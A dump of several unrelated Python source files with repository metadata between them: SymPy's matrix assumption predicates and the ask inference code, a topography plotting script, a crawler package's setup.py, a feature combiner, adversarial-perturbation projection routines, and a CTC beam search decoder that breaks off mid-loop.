are linearly independent. A square matrix is full rank iff
its determinant is nonzero.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, ZeroMatrix, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> ask(Q.fullrank(X.T), Q.fullrank(X))
True
>>> ask(Q.fullrank(ZeroMatrix(3, 3)))
False
>>> ask(Q.fullrank(Identity(3)))
True
"""
return Predicate('fullrank')
@predicate_memo
def square(self):
"""
Square matrix predicate.
``Q.square(x)`` is true iff ``x`` is a square matrix. A square matrix
is a matrix with the same number of rows and columns.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, ZeroMatrix, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('X', 2, 3)
>>> ask(Q.square(X))
True
>>> ask(Q.square(Y))
False
>>> ask(Q.square(ZeroMatrix(3, 3)))
True
>>> ask(Q.square(Identity(3)))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Square_matrix
"""
return Predicate('square')
@predicate_memo
def integer_elements(self):
"""
Integer elements matrix predicate.
``Q.integer_elements(x)`` is true iff all the elements of ``x``
are integers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.integer(X[1, 2]), Q.integer_elements(X))
True
"""
return Predicate('integer_elements')
@predicate_memo
def real_elements(self):
"""
Real elements matrix predicate.
``Q.real_elements(x)`` is true iff all the elements of ``x``
are real numbers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.real(X[1, 2]), Q.real_elements(X))
True
"""
return Predicate('real_elements')
@predicate_memo
def complex_elements(self):
"""
Complex elements matrix predicate.
``Q.complex_elements(x)`` is true iff all the elements of ``x``
are complex numbers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.complex(X[1, 2]), Q.complex_elements(X))
True
>>> ask(Q.complex_elements(X), Q.integer_elements(X))
True
"""
return Predicate('complex_elements')
@predicate_memo
def singular(self):
"""
Singular matrix predicate.
A matrix is singular iff the value of its determinant is 0.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.singular(X), Q.invertible(X))
False
>>> ask(Q.singular(X), ~Q.invertible(X))
True
References
==========
.. [1] http://mathworld.wolfram.com/SingularMatrix.html
"""
return Predicate('singular')
@predicate_memo
def normal(self):
"""
Normal matrix predicate.
A matrix is normal if it commutes with its conjugate transpose.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.normal(X), Q.unitary(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Normal_matrix
"""
return Predicate('normal')
@predicate_memo
def triangular(self):
"""
Triangular matrix predicate.
``Q.triangular(X)`` is true if ``X`` is one that is either lower
triangular or upper triangular.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.triangular(X), Q.upper_triangular(X))
True
>>> ask(Q.triangular(X), Q.lower_triangular(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Triangular_matrix
"""
return Predicate('triangular')
@predicate_memo
def unit_triangular(self):
"""
Unit triangular matrix predicate.
A unit triangular matrix is a triangular matrix with 1s
on the diagonal.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.triangular(X), Q.unit_triangular(X))
True
"""
return Predicate('unit_triangular')
Q = AssumptionKeys()
def _extract_facts(expr, symbol, check_reversed_rel=True):
"""
Helper for ask().
Extracts the facts relevant to the symbol from an assumption.
Returns None if there is nothing to extract.
"""
if isinstance(symbol, Relational):
if check_reversed_rel:
rev = _extract_facts(expr, symbol.reversed, False)
if rev is not None:
return rev
if isinstance(expr, bool):
return
if not expr.has(symbol):
return
if isinstance(expr, AppliedPredicate):
if expr.arg == symbol:
return expr.func
else:
return
if isinstance(expr, Not) and expr.args[0].func in (And, Or):
cls = Or if expr.args[0] == And else And
expr = cls(*[~arg for arg in expr.args[0].args])
args = [_extract_facts(arg, symbol) for arg in expr.args]
if isinstance(expr, And):
args = [x for x in args if x is not None]
if args:
return expr.func(*args)
if args and all(x != None for x in args):
return expr.func(*args)
def ask(proposition, assumptions=True, context=global_assumptions):
"""
Method for inferring properties about objects.
**Syntax**
* ask(proposition)
* ask(proposition, assumptions)
where ``proposition`` is any boolean expression
Examples
========
>>> from sympy import ask, Q, pi
>>> from sympy.abc import x, y
>>> ask(Q.rational(pi))
False
>>> ask(Q.even(x*y), Q.even(x) & Q.integer(y))
True
>>> ask(Q.prime(4*x), Q.integer(x))
False
**Remarks**
Relations in assumptions are not implemented (yet), so the following
will not give a meaningful result.
>>> ask(Q.positive(x), Q.is_true(x > 0)) # doctest: +SKIP
It is however a work in progress.
"""
from sympy.assumptions.satask import satask
if not isinstance(proposition, (BooleanFunction, AppliedPredicate, bool, BooleanAtom)):
raise TypeError("proposition must be a valid logical expression")
if not isinstance(assumptions, (BooleanFunction, AppliedPredicate, bool, BooleanAtom)):
raise TypeError("assumptions must be a valid logical expression")
if isinstance(proposition, AppliedPredicate):
key, expr = proposition.func, sympify(proposition.arg)
else:
key, expr = Q.is_true, sympify(proposition)
assumptions = And(assumptions, And(*context))
assumptions = to_cnf(assumptions)
local_facts = _extract_facts(assumptions, expr)
known_facts_cnf = get_known_facts_cnf()
known_facts_dict = get_known_facts_dict()
if local_facts and satisfiable(And(local_facts, known_facts_cnf)) is False:
raise ValueError("inconsistent assumptions %s" % assumptions)
# direct resolution method, no logic
res = key(expr)._eval_ask(assumptions)
if res is not None:
return bool(res)
if local_facts is None:
return satask(proposition, assumptions=assumptions, context=context)
# See if there's a straight-forward conclusion we can make for the inference
if local_facts.is_Atom:
if key in known_facts_dict[local_facts]:
return True
if Not(key) in known_facts_dict[local_facts]:
return False
elif (local_facts.func is And and
all(k in known_facts_dict for k in local_facts.args)):
for assum in local_facts.args:
if assum.is_Atom:
if key in known_facts_dict[assum]:
return True
if Not(key) in known_facts_dict[assum]:
return False
elif assum.func is Not and assum.args[0].is_Atom:
if key in known_facts_dict[assum]:
return False
if Not(key) in known_facts_dict[assum]:
return True
elif (isinstance(key, Predicate) and
local_facts.func is Not and local_facts.args[0].is_Atom):
if local_facts.args[0] in known_facts_dict[key]:
return False
# Failing all else, we do a full logical inference
res = ask_full_inference(key, local_facts, known_facts_cnf)
if res is None:
return satask(proposition, assumptions=assumptions, context=context)
return res
def ask_full_inference(proposition, assumptions, known_facts_cnf):
"""
Method for inferring properties about objects.
"""
if not satisfiable(And(known_facts_cnf, assumptions, proposition)):
return False
if not satisfiable(And(known_facts_cnf, assumptions, Not(proposition))):
return True
return None
def register_handler(key, handler):
"""
Register a handler in the ask system. key must be a string and handler a
class inheriting from AskHandler::
>>> from sympy.assumptions import register_handler, ask, Q
>>> from sympy.assumptions.handlers import AskHandler
>>> class MersenneHandler(AskHandler):
... # Mersenne numbers are in the form 2**n + 1, n integer
... @staticmethod
... def Integer(expr, assumptions):
... from sympy import log
... return ask(Q.integer(log(expr + 1, 2)))
>>> register_handler('mersenne', MersenneHandler)
>>> ask(Q.mersenne(7))
True
"""
if type(key) is Predicate:
key = key.name
try:
getattr(Q, key).add_handler(handler)
except AttributeError:
setattr(Q, key, Predicate(key, handlers=[handler]))
def remove_handler(key, handler):
"""Removes a handler from the ask system. Same syntax as register_handler"""
if type(key) is Predicate:
key = key.name
getattr(Q, key).remove_handler(handler)
def single_fact_lookup(known_facts_keys, known_facts_cnf):
# Compute the quick lookup for single facts
mapping = {}
for key in known_facts_keys:
mapping[key] = {key}
for other_key in known_facts_keys:
if other_key != key:
if ask_full_inference(other_key, key, known_facts_cnf):
mapping[key].add(other_key)
return mapping
def compute_known_facts(known_facts, known_facts_keys):
"""Compute the various forms of knowledge compilation used by the
assumptions system.
This function is typically applied to the results of the ``get_known_facts``
and ``get_known_facts_keys`` functions defined at the bottom of
this file.
"""
from textwrap import dedent, wrap
fact_string = dedent('''\
"""
The contents of this file are the return value of
``sympy.assumptions.ask.compute_known_facts``.
Do NOT manually edit this file.
Instead, run ./bin/ask_update.py.
"""
from sympy.core.cache import cacheit
from sympy.logic.boolalg import And, Not, Or
from sympy.assumptions.ask import Q
# -{ Known facts in Conjunctive Normal Form }-
@cacheit
def get_known_facts_cnf():
return And(
%s
)
# -{ Known facts in compressed sets }-
@cacheit
def get_known_facts_dict():
return {
%s
}
''')
# Compute the known facts in CNF form for logical inference
LINE = ",\n "
HANG = ' '*8
cnf = to_cnf(known_facts)
c = LINE.join([str(a) for a in cnf.args])
mapping = single_fact_lookup(known_facts_keys, cnf)
items = sorted(mapping.items(), key=str)
keys = [str(i[0]) for i in items]
values = ['set(%s)' % sorted(i[1], key=str) for i in items]
m = LINE.join(['\n'.join(
wrap("%s: %s" % (k, v),
subsequent_indent=HANG,
break_long_words=False))
for k, v in zip(keys, values)]) + ','
return fact_string % (c, m)
# handlers tells us what ask handler we should use
# for a particular key
_val_template = 'sympy.assumptions.handlers.%s'
_handlers = [
("antihermitian", "sets.AskAntiHermitianHandler"),
("finite", "calculus.AskFiniteHandler"),
("commutative", "AskCommutativeHandler"),
("complex", "sets.AskComplexHandler"),
("composite", "ntheory.AskCompositeHandler"),
("even", "ntheory.AskEvenHandler"),
("extended_real", "sets.AskExtendedRealHandler"),
("hermitian", "sets.AskHermitianHandler"),
("imaginary", "sets.AskImaginaryHandler"),
("integer", "sets.AskIntegerHandler"),
("irrational", "sets.AskIrrationalHandler"),
("rational", "sets.AskRationalHandler"),
("negative", "order.AskNegativeHandler"),
("nonzero", "order.AskNonZeroHandler"),
("nonpositive", "order.AskNonPositiveHandler"),
("nonnegative", "order.AskNonNegativeHandler"),
("zero", "order.AskZeroHandler"),
("positive", "order.AskPositiveHandler"),
("prime", "ntheory.AskPrimeHandler"),
("real", "sets.AskRealHandler"),
("odd", "ntheory.AskOddHandler"),
("algebraic", "sets.AskAlgebraicHandler"),
("is_true", "common.TautologicalHandler"),
("symmetric", "matrices.AskSymmetricHandler"),
("invertible", "matrices.AskInvertibleHandler"),
("orthogonal", "matrices.AskOrthogonalHandler"),
("unitary", "matrices.AskUnitaryHandler"),
("positive_definite", "matrices.AskPositiveDefiniteHandler"),
("upper_triangular", "matrices.AskUpperTriangularHandler"),
("lower_triangular", "matrices.AskLowerTriangularHandler"),
("diagonal", "matrices.AskDiagonalHandler"),
("fullrank", "matrices.AskFullRankHandler"),
("square", "matrices.AskSquareHandler"),
("integer_elements", "matrices.AskIntegerElementsHandler"),
("real_elements", "matrices.AskRealElementsHandler"),
("complex_elements", "matrices.AskComplexElementsHandler"),
]
for name, value in _handlers:
register_handler(name, _val_template % value)
@cacheit
def get_known_facts_keys():
return [
getattr(Q, attr)
for attr in Q.__class__.__dict__
if not (attr.startswith('__') or
attr in deprecated_predicates)]
@cacheit
def get_known_facts():
return And(
Implies(Q.infinite, ~Q.finite),
Implies(Q.real, Q.complex),
Implies(Q.real, Q.hermitian),
Equivalent(Q.extended_real, Q.real | Q.infinite),
Equivalent(Q.even | Q.odd, Q.integer),
Implies(Q.even, ~Q.odd),
Equivalent(Q.prime, Q.integer & Q.positive & ~Q.composite),
Implies(Q.integer, Q.rational),
Implies(Q.rational, Q.algebraic),
Implies(Q.algebraic, Q.complex),
Equivalent(Q.transcendental | Q.algebraic, Q.complex),
Implies(Q.transcendental, ~Q.algebraic),
Implies(Q.imaginary, Q.complex & ~Q.real),
Implies(Q.imaginary, Q.antihermitian),
Implies(Q.antihermitian, ~Q.hermitian),
Equivalent(Q.irrational | Q.rational, Q.real),
Implies(Q.irrational, ~Q.rational),
Implies(Q.zero, Q.even),
Equivalent(Q.real, Q.negative | Q.zero | Q.positive),
Implies(Q.zero, ~Q.negative & ~Q.positive),
Implies(Q.negative, ~Q.positive),
Equivalent(Q.nonnegative, Q.zero | Q.positive),
Equivalent(Q.nonpositive, Q.zero | Q.negative),
Equivalent(Q.nonzero, Q.negative | Q.positive),
Implies(Q.orthogonal, Q.positive_definite),
Implies(Q.orthogonal, Q.unitary),
Implies(Q.unitary & Q.real, Q.orthogonal),
Implies(Q.unitary, Q.normal),
Implies(Q.unitary, Q.invertible),
Implies(Q.normal, Q.square),
Implies(Q.diagonal, Q.normal),
Implies(Q.positive_definite, Q.invertible),
Implies(Q.diagonal, Q.upper_triangular),
Implies(Q.diagonal, Q.lower_triangular),
Implies(Q.lower_triangular, Q.triangular),
Implies(Q.upper_triangular, Q.triangular),
Implies(Q.triangular, Q.upper_triangular | Q.lower_triangular),
Implies(Q.upper_triangular & Q.lower_triangular, Q.diagonal),
Implies(Q.diagonal, Q.symmetric),
Implies(Q.unit_triangular, Q.triangular),
Implies(Q.invertible, Q.fullrank),
Implies(Q.invertible, Q.square),
Implies(Q.symmetric, Q.square),
Implies(Q.fullrank & Q.square, Q.invertible),
Equivalent(Q.invertible, ~Q.singular),
Implies(Q.integer_elements, Q.real_elements),
Implies(Q.real_elements, Q.complex_elements),
)
from sympy.assumptions.ask_generated import (
get_known_facts_dict, get_known_facts_cnf)
| 28.446405
| 91
| 0.557039
|
14b776ff88ac69dbffe34ddd9d6ea4bdc4f4b1ee
| 1,479
|
py
|
Python
|
scripts/plot_europe.py
|
MaxNoe/soak19
|
76ebffe8290118a7bb0a927d87a66e6664c0b4c8
|
[
"MIT"
] | 1
|
2020-11-24T19:07:55.000Z
|
2020-11-24T19:07:55.000Z
|
scripts/plot_europe.py
|
maxnoe/soak19
|
76ebffe8290118a7bb0a927d87a66e6664c0b4c8
|
[
"MIT"
] | null | null | null |
scripts/plot_europe.py
|
maxnoe/soak19
|
76ebffe8290118a7bb0a927d87a66e6664c0b4c8
|
[
"MIT"
] | null | null | null |
import xarray
import matplotlib.pyplot as plt
from matplotlib.colors import LinearSegmentedColormap, DivergingNorm
import numpy as np
dataset = xarray.open_dataset('data/ETOPO1_Ice_g_gdal.grd')
shape = tuple(dataset.dimension.values[::-1])
z = dataset.z.values.reshape(shape)
lon1 = -22
lon2 = 45
lat1 = 30
lat2 = 75
idx2 = int(-lat1 / 180 * shape[0]) + shape[0] // 2
idx1 = int(-lat2 / 180 * shape[0]) + shape[0] // 2
idx3 = int(lon1 / 360 * shape[1]) + shape[1] // 2
idx4 = int(lon2 / 360 * shape[1]) + shape[1] // 2
print(idx1, idx2, idx3, idx4)
z = z[idx1:idx2, idx3:idx4]
print(z.min(), z.max())
fig = plt.figure(constrained_layout=True)
ax = fig.add_subplot(1, 1, 1)
ax.set_axis_off()
img = plt.imshow(
z,
cmap='jet',
vmin=-5e3,
vmax=5e3,
# extent=[-180, 180, -90, 90]
)
img.set_rasterized(True)
fig.colorbar(img)
fig.savefig('build/plots/europe_jet.pdf')
colors_undersea = plt.cm.terrain(np.linspace(0, 0.17, 256))
colors_land = plt.cm.terrain(np.linspace(0.25, 1, 256))
all_colors = np.vstack((colors_undersea, colors_land))
terrain_map = LinearSegmentedColormap.from_list('terrain_map', all_colors)
divnorm = DivergingNorm(vmin=-5e3, vcenter=0, vmax=5e3)
fig = plt.figure(constrained_layout=True)
ax = fig.add_subplot(1, 1, 1)
ax.set_axis_off()
img = plt.imshow(
z,
cmap=terrain_map,
norm=divnorm,
# extent=[-180, 180, -90, 90]
)
img.set_rasterized(True)
fig.colorbar(img)
fig.savefig('build/plots/europe_divnorm.pdf')
| 23.109375
| 74
| 0.691007
|
e781a9572985e96058c6f383e5e8534ff2647249
| 1,648
|
py
|
Python
|
setup.py
|
INNOVINATI/microwler
|
958430d1804f4c29e07bfdd8dccab369d5bbda3e
|
[
"MIT"
] | 11
|
2021-01-12T14:45:12.000Z
|
2022-02-09T02:09:00.000Z
|
setup.py
|
INNOVINATI/microwler
|
958430d1804f4c29e07bfdd8dccab369d5bbda3e
|
[
"MIT"
] | null | null | null |
setup.py
|
INNOVINATI/microwler
|
958430d1804f4c29e07bfdd8dccab369d5bbda3e
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
import pathlib
here = pathlib.Path(__file__).parent.resolve()
long_description = (here / 'README.md').read_text(encoding='utf-8')
setup(
name='microwler',
version='0.1.8',
description='A micro-framework for asynchronous deep crawls and web scraping written in Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://innovinati.github.io/microwler/',
author='Maximilian Wolf',
author_email='maximilian.wolf@innovinati.com',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Framework :: AsyncIO',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3 :: Only',
],
packages=['microwler', 'microwler.cli', 'microwler.web'],
include_package_data=True,
python_requires='>=3.7, <4',
install_requires=[
'aiohttp', 'lxml', 'diskcache', 'prettytable', 'quart',
'random-user-agent', 'html-text', 'completely', 'click',
'parsel', 'chardet', 'quart-cors', 'aiodns'
],
entry_points='''
[console_scripts]
microwler=microwler.cli.cmd:show_help
new=microwler.cli.cmd:add_project
crawler=microwler.cli.cmd:crawler
serve=microwler.cli.cmd:start_server
''',
project_urls={
'Issues': 'https://github.com/INNOVINATI/microwler/issues',
'Source': 'https://github.com/INNOVINATI/microwler/',
},
)
| 35.06383
| 100
| 0.649879
|
60fdfddd8a4d0bfd39fdce4f9733537cba69ac06
| 824
|
py
|
Python
|
src/extractors/featurecombiner.py
|
safdark/advanced-lane-lines
|
27edcc444ac532e84749d667fc579970d2059aff
|
[
"Apache-2.0"
] | null | null | null |
src/extractors/featurecombiner.py
|
safdark/advanced-lane-lines
|
27edcc444ac532e84749d667fc579970d2059aff
|
[
"Apache-2.0"
] | 6
|
2017-01-01T12:12:57.000Z
|
2017-01-06T03:40:49.000Z
|
src/extractors/featurecombiner.py
|
safdark/advanced-lane-lines
|
27edcc444ac532e84749d667fc579970d2059aff
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on Jan 14, 2017
@author: safdar
'''
import numpy as np
from sklearn.preprocessing.data import StandardScaler
class FeatureCombiner(object):
def __init__(self, extractors):
self.__extractors__ = extractors
def extract(self, image):
featurelist = []
for extractor in self.__extractors__:
feature = extractor.extract(image)
assert feature is not None, "Feature obtained from {} was none".format(extractor.__class__.__name__)
featurelist.append(feature)
features = np.concatenate(tuple(featurelist))
scaled_features = StandardScaler().fit_transform(features.reshape(-1,1))
#scaled_features = scaled_features.reshape(1, -1)
scaled_features = scaled_features.ravel()
return scaled_features
| 32.96
| 112
| 0.675971
|
a74c32c0ee5f1bd8755fe2e955590d6c96a833ba
| 5,203
|
py
|
Python
|
adv_lib/attacks/fast_adaptive_boundary/projections.py
|
Daulbaev/adversarial-library
|
6f979a511ad78908374cd55855a9e2c5a874be7d
|
[
"BSD-3-Clause"
] | 55
|
2020-11-25T10:47:48.000Z
|
2022-03-21T12:11:31.000Z
|
adv_lib/attacks/fast_adaptive_boundary/projections.py
|
Daulbaev/adversarial-library
|
6f979a511ad78908374cd55855a9e2c5a874be7d
|
[
"BSD-3-Clause"
] | 4
|
2021-03-10T19:25:31.000Z
|
2021-08-06T00:10:49.000Z
|
adv_lib/attacks/fast_adaptive_boundary/projections.py
|
Daulbaev/adversarial-library
|
6f979a511ad78908374cd55855a9e2c5a874be7d
|
[
"BSD-3-Clause"
] | 8
|
2020-11-26T08:42:04.000Z
|
2022-01-13T02:55:47.000Z
|
import math
import torch
from torch import Tensor
from torch.nn import functional as F
def projection_l1(points_to_project: Tensor, w_hyperplane: Tensor, b_hyperplane: Tensor) -> Tensor:
device = points_to_project.device
t, w, b = points_to_project, w_hyperplane.clone(), b_hyperplane
c = (w * t).sum(1) - b
ind2 = 2 * (c >= 0) - 1
w.mul_(ind2.unsqueeze(1))
c.mul_(ind2)
r = (1 / w).abs().clamp_max(1e12)
indr = torch.argsort(r, dim=1)
indr_rev = torch.argsort(indr)
c6 = (w < 0).float()
d = (-t + c6) * (w != 0).float()
ds = torch.min(-w * t, w * (1 - t)).gather(1, indr)
ds2 = torch.cat((c.unsqueeze(-1), ds), 1)
s = torch.cumsum(ds2, dim=1)
c2 = s[:, -1] < 0
lb = torch.zeros(c2.sum(), device=device)
ub = torch.full_like(lb, s.shape[1])
nitermax = math.ceil(math.log2(w.shape[1]))
s_ = s[c2]
for counter in range(nitermax):
counter4 = torch.floor((lb + ub) / 2)
counter2 = counter4.long().unsqueeze(1)
c3 = s_.gather(1, counter2).squeeze(1) > 0
lb = torch.where(c3, counter4, lb)
ub = torch.where(c3, ub, counter4)
lb2 = lb.long()
if c2.any():
indr = indr[c2].gather(1, lb2.unsqueeze(1)).squeeze(1)
u = torch.arange(0, w.shape[0], device=device).unsqueeze(1)
u2 = torch.arange(0, w.shape[1], device=device, dtype=torch.float).unsqueeze(0)
alpha = -s[c2, lb2] / w[c2, indr]
c5 = u2 < lb.unsqueeze(-1)
u3 = c5[u[:c5.shape[0]], indr_rev[c2]]
d[c2] = d[c2] * u3.float()
d[c2, indr] = alpha
return d * (w.abs() > 1e-8).float()
def projection_l2(points_to_project: Tensor, w_hyperplane: Tensor, b_hyperplane: Tensor) -> Tensor:
device = points_to_project.device
t, w, b = points_to_project, w_hyperplane.clone(), b_hyperplane
c = (w * t).sum(1) - b
ind2 = 2 * (c >= 0) - 1
w.mul_(ind2.unsqueeze(1))
c.mul_(ind2)
r = torch.max(t / w, (t - 1) / w).clamp(min=-1e12, max=1e12)
r.masked_fill_(w.abs() < 1e-8, 1e12)
r[r == -1e12] *= -1
rs, indr = torch.sort(r, dim=1)
rs2 = F.pad(rs[:, 1:], (0, 1))
rs.masked_fill_(rs == 1e12, 0)
rs2.masked_fill_(rs2 == 1e12, 0)
w3s = (w ** 2).gather(1, indr)
w5 = w3s.sum(dim=1, keepdim=True)
ws = w5 - torch.cumsum(w3s, dim=1)
d = -(r * w)
d.mul_((w.abs() > 1e-8).float())
s = torch.cat((-w5 * rs[:, 0:1], torch.cumsum((-rs2 + rs) * ws, dim=1) - w5 * rs[:, 0:1]), 1)
c4 = s[:, 0] + c < 0
c3 = (d * w).sum(dim=1) + c > 0
c2 = ~(c4 | c3)
lb = torch.zeros(c2.sum(), device=device)
ub = torch.full_like(lb, w.shape[1] - 1)
nitermax = math.ceil(math.log2(w.shape[1]))
s_, c_ = s[c2], c[c2]
for counter in range(nitermax):
counter4 = torch.floor((lb + ub) / 2)
counter2 = counter4.long().unsqueeze(1)
c3 = s_.gather(1, counter2).squeeze(1) + c_ > 0
lb = torch.where(c3, counter4, lb)
ub = torch.where(c3, ub, counter4)
lb = lb.long()
if c4.any():
alpha = c[c4] / w5[c4].squeeze(-1)
d[c4] = -alpha.unsqueeze(-1) * w[c4]
if c2.any():
alpha = (s[c2, lb] + c[c2]) / ws[c2, lb] + rs[c2, lb]
alpha[ws[c2, lb] == 0] = 0
c5 = (alpha.unsqueeze(-1) > r[c2]).float()
d[c2] = d[c2] * c5 - alpha.unsqueeze(-1) * w[c2] * (1 - c5)
return d * (w.abs() > 1e-8).float()
def projection_linf(points_to_project: Tensor, w_hyperplane: Tensor, b_hyperplane: Tensor) -> Tensor:
device = points_to_project.device
t, w, b = points_to_project, w_hyperplane.clone(), b_hyperplane.clone()
sign = 2 * ((w * t).sum(1) - b >= 0) - 1
w.mul_(sign.unsqueeze(1))
b.mul_(sign)
a = (w < 0).float()
d = (a - t) * (w != 0).float()
p = a - t * (2 * a - 1)
indp = torch.argsort(p, dim=1)
b = b - (w * t).sum(1)
b0 = (w * d).sum(1)
indp2 = indp.flip((1,))
ws = w.gather(1, indp2)
bs2 = - ws * d.gather(1, indp2)
s = torch.cumsum(ws.abs(), dim=1)
sb = torch.cumsum(bs2, dim=1) + b0.unsqueeze(1)
b2 = sb[:, -1] - s[:, -1] * p.gather(1, indp[:, 0:1]).squeeze(1)
c_l = b - b2 > 0
c2 = (b - b0 > 0) & (~c_l)
lb = torch.zeros(c2.sum(), device=device)
ub = torch.full_like(lb, w.shape[1] - 1)
nitermax = math.ceil(math.log2(w.shape[1]))
indp_, sb_, s_, p_, b_ = indp[c2], sb[c2], s[c2], p[c2], b[c2]
for counter in range(nitermax):
counter4 = torch.floor((lb + ub) / 2)
counter2 = counter4.long().unsqueeze(1)
indcurr = indp_.gather(1, indp_.size(1) - 1 - counter2)
b2 = (sb_.gather(1, counter2) - s_.gather(1, counter2) * p_.gather(1, indcurr)).squeeze(1)
c = b_ - b2 > 0
lb = torch.where(c, counter4, lb)
ub = torch.where(c, ub, counter4)
lb = lb.long()
if c_l.any():
lmbd_opt = torch.clamp_min((b[c_l] - sb[c_l, -1]) / (-s[c_l, -1]), min=0).unsqueeze(-1)
d[c_l] = (2 * a[c_l] - 1) * lmbd_opt
lmbd_opt = torch.clamp_min((b[c2] - sb[c2, lb]) / (-s[c2, lb]), min=0).unsqueeze(-1)
d[c2] = torch.min(lmbd_opt, d[c2]) * a[c2] + torch.max(-lmbd_opt, d[c2]) * (1 - a[c2])
return d * (w != 0).float()
| 31.72561
| 101
| 0.540265
|
86530cd49650d8b0ce33c2bc39be5879d637445f
| 6,639
|
py
|
Python
|
ocr/utils/beam_search.py
|
vee51/Hand
|
eae25f189e7561d5b386511e11de2b9cec29b7a5
|
[
"Apache-2.0"
] | 435
|
2019-03-16T21:45:56.000Z
|
2022-03-25T09:14:22.000Z
|
ocr/utils/beam_search.py
|
freedom9393/handwritten-text-recognition-for-apache-mxnet
|
bf7b6297747c794046665c682d04a153aaec20dd
|
[
"Apache-2.0"
] | 60
|
2019-03-19T05:53:40.000Z
|
2022-03-31T12:27:48.000Z
|
ocr/utils/beam_search.py
|
freedom9393/handwritten-text-recognition-for-apache-mxnet
|
bf7b6297747c794046665c682d04a153aaec20dd
|
[
"Apache-2.0"
] | 220
|
2019-03-17T10:06:06.000Z
|
2022-03-15T14:13:39.000Z
|
# From https://github.com/githubharald/CTCDecoder
#
#MIT License
#Copyright (c) 2018 Harald Scheidl
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from __future__ import division
from __future__ import print_function
import numpy as np
class BeamEntry:
"information about one single beam at specific time-step"
def __init__(self):
self.prTotal = 0 # blank and non-blank
self.prNonBlank = 0 # non-blank
self.prBlank = 0 # blank
self.prText = 1 # LM score
self.lmApplied = False # flag if LM was already applied to this beam
self.labeling = () # beam-labeling
class BeamState:
"information about the beams at specific time-step"
def __init__(self):
self.entries = {}
def norm(self):
"length-normalise LM score"
for (k, _) in self.entries.items():
labelingLen = len(self.entries[k].labeling)
self.entries[k].prText = self.entries[k].prText ** (1.0 / (labelingLen if labelingLen else 1.0))
def sort(self):
"return beam-labelings, sorted by probability"
beams = [v for (_, v) in self.entries.items()]
sortedBeams = sorted(beams, reverse=True, key=lambda x: x.prTotal*x.prText)
return [x.labeling for x in sortedBeams]
def applyLM(parentBeam, childBeam, classes, lm):
"calculate LM score of child beam by taking score from parent beam and bigram probability of last two chars"
if lm and not childBeam.lmApplied:
c1 = classes[parentBeam.labeling[-1] if parentBeam.labeling else classes.index(' ')] # first char
c2 = classes[childBeam.labeling[-1]] # second char
lmFactor = 0.01 # influence of language model
bigramProb = lm.getCharBigram(c1, c2) ** lmFactor # probability of seeing first and second char next to each other
childBeam.prText = parentBeam.prText * bigramProb # probability of char sequence
childBeam.lmApplied = True # only apply LM once per beam entry
def addBeam(beamState, labeling):
"add beam if it does not yet exist"
if labeling not in beamState.entries:
beamState.entries[labeling] = BeamEntry()
def ctcBeamSearch(mat, classes, lm, beamWidth):
"beam search as described by the paper of Hwang et al. and the paper of Graves et al."
blankIdx = len(classes)
maxT, maxC = mat.shape
# initialise beam state
last = BeamState()
labeling = ()
last.entries[labeling] = BeamEntry()
last.entries[labeling].prBlank = 1
last.entries[labeling].prTotal = 1
# go over all time-steps
for t in range(maxT):
curr = BeamState()
# get beam-labelings of best beams
bestLabelings = last.sort()[0:beamWidth]
# go over best beams
for labeling in bestLabelings:
# probability of paths ending with a non-blank
prNonBlank = 0
# in case of non-empty beam
if labeling:
# probability of paths with repeated last char at the end
try:
prNonBlank = last.entries[labeling].prNonBlank * mat[t, labeling[-1]]
except FloatingPointError:
prNonBlank = 0
# probability of paths ending with a blank
prBlank = (last.entries[labeling].prTotal) * mat[t, blankIdx]
# add beam at current time-step if needed
addBeam(curr, labeling)
# fill in data
curr.entries[labeling].labeling = labeling
curr.entries[labeling].prNonBlank += prNonBlank
curr.entries[labeling].prBlank += prBlank
curr.entries[labeling].prTotal += prBlank + prNonBlank
curr.entries[labeling].prText = last.entries[labeling].prText # beam-labeling not changed, therefore also LM score unchanged from
curr.entries[labeling].lmApplied = True # LM already applied at previous time-step for this beam-labeling
# extend current beam-labeling
for c in range(maxC - 1):
# add new char to current beam-labeling
